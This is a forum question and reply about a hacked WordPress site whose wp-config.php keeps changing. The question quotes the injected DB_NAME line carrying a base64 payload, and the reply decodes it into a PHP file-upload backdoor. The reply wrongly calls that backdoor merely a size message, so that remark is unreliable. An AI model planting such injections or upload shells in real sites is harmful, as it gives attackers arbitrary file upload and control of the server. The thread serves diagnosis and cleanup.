I am using WordPress and a plug-in called WP-Rocket to optimise my website. Since two days ago, wp-config.php file keeps changing the Database name to something like below code.
**Original DB name was define('DB_NAME', 'db1');**
But changed to
**define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRk
lMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYi
kiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW
5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWy
JmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2
hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi
4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\')); /*');</i>
The username and password were also changed to 'user' and 'password' as shown below.
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'password');</i>
This is a security issue. A plugin is changing your config to open a backdoor.
I found that article that can help you: https://secure.wphackedhelp.com/blog/wordpress-backdoor-hack/
I think you have a hacked website. If you decode (https://www.base64decode.org/) the code you will get:
<?php
echo "This shit works!";
if (isset($_FILES["filename"]))
{
if($_FILES["filename"]["size"] > 1024*3*1024)
{
echo ("File too large (more than 3Mb)");
exit;
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
echo ("<br>Done!<br>");
} else {
echo("<br>Error! ".$php_errormsg."<br>");
}
}
?>
The code is only a message about the uploaded file size, but i think its a part of more hacked base64 file parts.
So, now you have 2 options: 1) Hire someone.
2) Or you can go step by step through guides in the internet: This is the first you can check out on wp.org.
https://codex.wordpress.org/FAQ_My_site_was_hacked#Some_steps_to_take
Hint: If a website is hacked you should first make it non available for visitors, that nobody can be infected.